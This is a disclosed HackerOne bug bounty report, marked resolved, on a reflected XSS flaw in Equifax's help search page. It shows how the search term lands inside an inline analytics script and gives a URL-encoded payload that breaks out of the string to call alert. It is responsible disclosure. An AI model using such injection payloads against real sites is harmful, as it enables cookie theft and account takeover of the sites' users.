reflected XSS in [www.equifax.com]

Disclosed: 2023-04-23 12:41:20 By abdo0x To equifax
Medium
Vulnerability Details
hi , I hope you are well, i found reflected XSS in this endpoint: ```https://www.equifax.com/personal/help/search?search=broook``` ###Steps: 1. open ```https://www.equifax.com/personal/help/search?search=broook``` 2. view the source code of the page and search for word ```broook``` you will find that it reflected in the source code: {F2094830} 3. ```broook``` word reflected in javascript code: ``` <script type="text/javascript"> window.onload = function(e){ Analytics.trackEvent('emptySearch',{internalSearchTerm: "broook" , numOfSearchResultsReturned: 0}); } </script> ``` - - 4. By using this payload ```%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b``` , I modified the parameters of the ```Analytics.trackEvent``` function to be like this: ``` <script type="text/javascript"> window.onload = function(e){ Analytics.trackEvent('SEARCHRETURNED',{internalSearchTerm: "" , internalSearchTerm: [7].map(alert) , numOfSearchResultsReturned: "b" , numOfSearchResultsReturned: 167}); } </script> ``` {F2094863} - - 5. the following is the link with my XSS payload : https://www.equifax.com/personal/help/search?search=%22%20%2C%20internalSearchTerm%3A%20%5B7%5D.map%28alert%29%20%2C%20numOfSearchResultsReturned%3A%20%22b {F2094867} ## Impact an attacker can exeute JS codes on the victims and this could be steal user's cookies
Actions
View on HackerOne
Report Stats
  • Report ID: 1818163
  • State: Closed
  • Substate: resolved
  • Upvotes: 42
Share this report